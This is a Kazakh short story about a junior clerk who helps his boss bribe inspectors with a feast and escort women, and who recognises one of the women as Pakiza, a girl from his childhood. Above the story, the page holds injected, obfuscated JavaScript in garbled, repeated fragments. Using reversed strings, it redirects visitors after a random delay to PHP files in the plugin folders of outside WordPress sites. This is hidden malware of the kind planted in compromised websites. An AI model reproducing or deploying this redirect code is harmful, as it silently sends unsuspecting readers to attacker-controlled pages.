Пәкиза

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to; vertical-align: middle; display: block;» alt=»6putana-anons» src=»images/stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/6putana-anons.jpg» height=»250″ width=»380″ />

Жұмысқа жаңадан кіріскені сол мұның  келуін күтіп тұрғандай-ақ тексеру деген басып салды. Мұндайда әрине, барлық ауырлық мұның мойнына түседі. Ұжымдағы ең кішісі де осы. Оның үстіне жаңадан келген.
– Әй, бала ананы әкел.
– Әй, бала мына құжатты тауып кел.
– Әй, бала түскі тамақтың қамын жасаңдар.
«Қазақтың кішісі болғанша, күшігі бол» деп осындайда айтса керек-ті. Бірақ, оған өкпелеп жатқан бұл жоқ. Қалай қарай бұйрық түссе солай қарай дөңгелей жөнеледі. Әйтеуір, басшылықтың қалайда көңілінен шығуы керек қой.
Тексерудің келгеніне бір апта болса да бұл үшін бір ай өткендей болды. Жүгіріп жүріп байқамаған екен, бастығы жеңінен өзіне тартып «біткен сияқты, енді жақсылап дастархан ұйымдастыруымыз керек» дегенде үстінен ауыр жүк құлағандай «үһ» деген.

– Ал, бала, – деді бастығы тағы да әдетінше атын атамаған күйі. – Анау алтын жағажайда дастархан ұйымдастыр. Бір «ырза қылып» жіберейік.
Мұндайда «Жаппарқұлда жан бар ма?» деп тағы да жүгіре жөнелмек еді, «Әй, бала, – деді басекең мұны тағы да тоқтатып – «Ана, Түймебайды қасыңа ертіп ал».
«Жарайды» деуге шамасы келмей жүре бас изеп кете барды.
«Алтын» деп әспеттейтін түгі қалмаған жағасы қоқысқа толы жағағжайға келіп тапсырыс берді.
– О-һо! – деп ойлады бұл іштей, – тексеруші дегендердің өмірі рахат екен ғой, ә?! Қайда барсаң да барлығы «иіліп жастық, жайылып төсек» болып тұрғаны. Жегенің алдыңда, жемегенің… Ой-хой шіркін, мен қашан бастық болар екенмін, – деп ойлады даяшы қыздар жасап жатқан столдың бір шетінде отырып. Мынау не деген дастархан? Осы дастарханды жасау үшін қанша қаражат кетті десеңші.
Ол осыны ойлағанда өз-өзінен іші күйіп кетті. Осының бәрі өзінің бір ай істеген еңбек ақысымен төленетінін ойлағанда тіпті көңіл күйі түсіп кетті. Бұдан бөлек тағы қалтасына салып беретіндерін айтсай… Не дегенмен бұл айда қызметкерлердің барлығы жарты айлық алатын болды ғой…
Ол мына әділетсіздікке іштей қынжылды. Бірақ тез ұмытуға тырысты.
– Басекеңдер келе жатыр, – деп есіктен кірген Түймебайдың асығыс даусынан дарақтан пыр-р етіп көтерілген топ торғайдай мұның да ішкі қынжылысы пыр-р етіп ұшып кетті.
Екеуі есік алдына шықты. Шілденің шыжыған аптабынан қорғап тұрған ағаштардың ала көлеңкесінде тұрып қонақтарын көп күтті.
Құмдауыт шөлдің шаңы мен қып-қызыл күннің ащы аптабынан шаршаған ағаштардың әлсіз сыбдыры естіледі. Жапырақтарын шаң басқан ағаштар мен жаман шалдың иегіндегі сақалдай күтімсіз әр жер-әр жерде сықсиған бұталардың халіне тіпті жаны ашып кетті.
– Алтын жағажай деген атына затын сай етіп қойса қайтер екен, – деп ойлады іштей. Атын атаудың өзі ұят сияқты. Бұл енді судың жағасына қарай бет алды. Шылп-шылп жағаны жуып жатқан майда толқындарға қарап ойланып кетіпті. Әлдекімнің ысқырғанын естіді. «Дәу де болса Түймебай аға шығар» деп ойлап үлгермей, артына бұрылды. Сол екен. Қолын бұлғады. Шақырғаны. Бұл енді тез адымдай жағажайдағы тамдарға қарай беттеді.
Бұлар ішке кіргенде  кешегі қатал тексерушілердің сұсының түгі қалмай бәрі жадыраңқы екен. Бұлар да шеткі орындыққа жайғасты, асалып жатқан аста, ішіліп жатқан арақта есеп жоқ. Анда-санда бір кекіріп қойып тексерушілердің ең үлкені Қарынбай мырза отыр. Мұның бастығы Қарынбайдың іші-бауырына кіріп барады. «О, бәлем, – деді бұл іштей мына көрініске таң қалып. – Әншейінде маңғаз, айтар сөзін мұрнымен міңгірлей сызбаланып сөйлейтін бастықтың қылпылдауын қарашы».
Қарынбай мырза ешкімнен ештеңе сұрамай-ақ коньяк толы рюмкесін қолына алып орнынан тұрды.
– Ал, Жөке, – деді Жөкеңе қарап мойнын бұрып. – Молодец інім. Бәрі жақсы. Жақсы болмаса  да жақсы қыламыз.
Бұған отырғандардың бәрі қол соғып қошеметтеп кетті. Неге қол соқты, нені жақсы қылады түк түсінбесе де бұл да соларға еріп еріксіз ыржиып қол соқты.
Содан соң бәрі жабылып Қарынбайға алғызды. Әлден соң Қарынбай су жайлы, өзінің жастығы жайлы әңгіме қозғап кетті.
– Сұлу Сырдың жағасына келіп тұрып, Сырдың суын бір кешпей, сыр сұлуын бір құшпай кетудің өзі күнә, – деді сөзінің  соңында Қарынбай дарақтап.
– Дұрыс, дұрыс, – деп отырған жұрт тіпті қалбалақтап кетті.
Бастығының селк еткенін бұл аңғарған. Сыртқа беттеген бастығының ізінен лып етіп Түймебай ере шықты. Бұл шығарын да, шықпасын да білмей отырған. Қалта телефоны бір «дірр» ете қалды. «Кім екен?» деп үңілген. Түймебай ағасы екен. Сыртқа шықты.
Түймебайдың қасында бастығы да тұр екен. «Не болып қалды екен?» деп ойлады бұл іштей. «Тағы бір жерге жұмсайтын шығар».
Бастығы бұған бір қарады, Түймебайға бір қарады. «Бәрін ұқтым» дегендей Түймебай бұған «жүр» деді. Екеуі келіп Түймебайдың жүрдек жорғасына отырғанда: «Не болды аға? Тағы не қалайды көңілдері?», –  деді бұл мына ыстықтағы итшабыстан шаршағанын білдіріп.
– Қыз, – деді Түймебай ерніндегі шылымын сыртқа бырт еткізіп бір шертіп. – Әкеңнің…
– Оны қайдан табамыз?
– Табылады ғой.
– Алдымен тамақтанып алайықшы, – деді Түймебай қалаға кіргенде бір асхананың қасына тоқтап.
– Басекеңдер күтіп қалмай ма?
– Күтсе күтер. Оларда асқазан болғанда бізде жоқ дейсің бе? Өзіміз де ақымақпыз ғой, бағанағы мол тамақтан жеп алмай.
– Иә,– деді бұл қоштай бас изеп Түймебай ағасының артынан ілесіп.
Бір-біріне қарама қарсы орналасқан үйлердің қасына келгенде Түймебай көлігінің жүруін бәсеңдетті.
– Қайсысы екен? Телефон соғып көрейікші. – Ұзақ күтпей-ақ, тұтқаның арғы жағынан әлдебір қыздың даусы естілді.
– Алло, қарындас. Біз жаңағы Жөкеңнің…
Арғы жақтан «күте тұрыңыз» деген дауыс естілді де телефон құрғырың дың-дың етіп қалды.
– Қазір шығады, – деді Түймебай екі алақанын ысқылап. – Бұлар анау-мынау «рахаттың» қыздары емес, інім. Бұларды біздің тілде «элитный» дейді. Жоғарғы қонақтардікі, – деді саусағын жоғары қарай шошайтып.
Қызметтің тағы бір сырына енді ғана қанық болған бұл Түймебайға бір, оның саусағына бір қарап қойды.
Бірі тар шалбар, бірі қысқа юбка киген екеу бұларға қарап жақындай түсті.
– Келді, – деді Түймебай артқы есікті ашуға ыңғайланып.
Екеуі келіп отырғанда көліктің ішін әдемі бір иіс алып кетті. Мұрынды қытықтаған мына бір иіс мұның барлық сезімдерін оятып жібергендей болды.
Жағажайға жете тоқтаған көліктен лып етіп лезде түсіп өзіне де белгісіз жылдамдықпен артқы есікті аша қойды. Бұл да болса қызметтік өмірге үйренісейін дегені шығар. Әйтпесе, өмірінде жігіт болып қыздарға мұндай қошамет көрсетпепті.
Көзіне мына жанар шоқтай басылды. Ыстық дидар…
«Қайдан көрдім?» деп ойлады іштей. Есіне түсіре алмады. Ойланған күйі Түймебайдың ізінен еріп бара жатқан екі қыздан көз алмай көліктің алдында қала берді.
Жүрегіндегі бір діріл мұны ішке кіруге беттетпейтіндей. Жаңағы қыз, жаңағы жанар көз алдынан кетпей қойды. Бұл енді жағаға қарай беттеді. «Кім бұл?» деген сұрақ көкейінен кетпей қойды. Жүзі таныс секілді, әлде біреуге ұқсата ма?
– Қой танымаймын, – дейді тағы да өзіне өзі күбірлеп. – Қайдағы жеңілаяқты қайдан танимын. Бәлкім бір жерде көрген шығармын. Ауруханада немесе тойда, тағы бір сондай  жерде… – Бұл ұзақ ойланды. Ішпеген соң ішке кіруге де қызықпады. Қара ағаштың көлеңкесінде Түймебайдың көлігінің музыкасын тыңдап ұзақ отырды. Отыра беруден де жалығып шомылуға кеткен топтың ізінен теңіз жағасына жол алды.
Анадайда дабырласып шуылдаған топқа жақындады. Бағанағы екі қыз да бұрыннан таныс адамдарша араласып кетіпті. Су ішінде жалаңаш денелер қызыл күннің шуағымен шағылысып, аппақ сандары ақ сазандай ағараңдайды.
Қарынбайдың құшағында жүрген қызды іштей қызғана ма қалай?
– Неге тұрсың шомылмай, – деді Түймебай жақындап, жұрт жалаңаш жүргенде мұның кимешең түріне қарап күліп. – Фигураңды көрсетуге ұялып тұрсың ба? – Әзілдей күлді.
Бұл да күлген сияқтанды.
– Жүр, – деді сонан соң судан шығып, – тамақтанамыз.
Бағанағы айра-жайра қалған дастарханды даяшылар қайта жасап қойыпты. Бір шетіне келіп отырып, енді дастарханның мұртын бұза бергендері сол еді сырттан әлдекімдердің даусы мен бірге қыздардың сыңғыр күлкісі естілді.
Есіктен кіре төрге озған Қарынбайдың ізінен жаңағы екі қыз кірді, артынан Жөкең көрінді.
– Ә, жігіттер, осында екенсіңдер ғой, жақсы болды. Давай, Қарекеңе жақсылап құйып жіберіңдер.
Түймебай осыны күтіп тұрғандай-ақ лып етіп тұра қойды. Бұл да енді отырудың мәнін таппай ұзын сирақ рөмкелерге сусын құя бастады.
Бұған таныс-бейтаныс жаңағы қыз Қарынбайдың қойнына кіріп елжіреп барады… Қарынбай да қыздың иығына қол салып, әр астан алып аузына тосып әлек. Жөкең де қалыспай әзіл айтқансып қасындағы қыздың аш беліне қол жүгіртіп қояды.
– Қане, Қареке алып қойыңыз, қане,– деп Жөкең біресе Қарынбайдың, біресе жанында отырған қыздың аузына ауызбастырығын тосып әлек.
– Ал, Светажан, қане ағаңның қолынан алып қой. – Света Жөкеңнің қолын қайтармай шыны стаканда мөлтілдеген коньякті қағып салды да шиедей қып-қызыл аузын ауызбастырыққа толтыра жымиып қойды.
Қареке, қане Сіз де алып қойыңыз. – Жөкең тарелкеде тізілген шұжықтан алып Қарынбайға ұсынды.
Жоқ, – деді Қарекең де осы сәт өзінің кім екенін танытып қалғысы келгендей маңғаздана. – Мынадай сұлулар тұрғанда шошқаның етінен жасалған мына пәле ауызбастырық бола ма? Қарындасымның мойнынан бір иіскесем, міне сол бастырық.
Қарынбай стакан толы арақты қағып салды да қасындағы қызға ұмтыла түсті.
– Пәкизажан…
Бұның төбесінен жай түскендей есеңгіреп қалды. «Пәкиза… Пәкиза…» Есіне түсті. Пәкиза ғой мынау… Пәкиза…
Пәкизаның туылғанына дейін есінде. Ол кезде бұл бес-алты жастағы бала болар. Апасымен осы Пәкизаның үйіне барғанды. Үй іші қарбалас. Әжесі Айткүл апа қуанышы қойнына сыймай шапқылап жүр.
– Немере құтты болсын, бауы берік болсын, – деп апасы ақ тілегін жаудырып жатыр. Қалбалақтап Айткүл кемпір бар жылы жұмсағын бұлардың алдына тосып жүр. Осы сәт есік алдына барылдап кеп тоқтаған ескі «Москвичтің» даусын естіп Айткүл кемпір сыртқа беттеді. Дастархандағы кәмпитті уыстап алып мұның апасы да аяғын сылти басып сыртқа шықты. Тауман атаның ескі тарылдағынан Зәуреш жеңгесі мен Думан ағасы түсіп келе жатты. Зәуреш жеңгесінің қолында кішкентай құндақ. Айткүл апа қуанғаннан теңселіп барып келінінің қолындағы құндақты аса бір абайлылықпен көтеріп алды. Мұның апасы уысындағы кәмпитті шашып жатыр.
– Ал, ал, теріп ал, – дейді бұған. Шашуды теріп жүрген Тауман атасы екеуі ғана.
Бұлар ішке кіргесін нәрестені Тауман атасы қолына алды.
– Шал атын қой. Тұңғыш немерең ғой, – деді Айткүл апа.
– Атын таң азанымен азан шақырып қоймаушы ма еді, – деді Тауман қарт әдетінше асықпай.
– Азан айтса болды ғой, қай уақыт болғанда не қылар дейсің? – Айткүл апа қолындағы шай кесесін сүрткішке сүртіп-сүртіп қою қызыл шайын құюға кірісті.
– Соңғы кезде ешкім азан шақырып ат қойып жатқан жоқ-ау осы. Аталарымыздың дәстүрі жыл өткен сайын ұмытылып бара жатыр. – Мұның апасы қынжылған сыңай танытты.
– Соны айтсаңшы, – деп Айткүл апа қостап қойды.
– Онда, – деді Тауман ата сәл-кем ойланып отырып. – Аты Пәкиза болсын. Өзі де, өмірі де жаңа туған сәбидей пәк, таза болсын…

*   *   *
Есіне түсті, есіне түсті. Сол ғой. Пәкиза ғой бұл. Бүкіл бала кезі көз алдында өтті. Ол кезде қоңыр шашты қыз еді. Қазір сарыға бояп алған ба, қалай? Бірақ, көзі, қасы, жанары, бәрі сол баяғы Пәкиза…
Қарындасындай болып қалған қызды көргенде басы мең-зең болып, көз алды қарауытып кетті. Қабырғадан ұстап әрең сыртқа беттеді. Сонда да болса «шынымен Пәкиза ма?» деп көңіл құрғыры сенбей артына тағы бір көз тастады. Қарынбайдың құшағында отырған қызды көрді. Сенді. Мына күйді көтере алмай теңселіп тұрған мұны Түймебай құшақтап алды.
– Мас болып қалды-ау, үйіне апарып сал, – деп жатқан Жөкеңнің даусын еміс-еміс естіді.
– Пәкиза… Пәкиза…– деді жүрегі қан жылап. – Сенің атыңды атаң пәк болсын деп қойып еді ғой…
Бірақ, оны ешкім естімеген күйі «Алтын жағажайдан» ұзай берді…

Бақтыгүл АУДАНОВА.{jcomments on}

http://kyzmet-gazeti.kz/

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика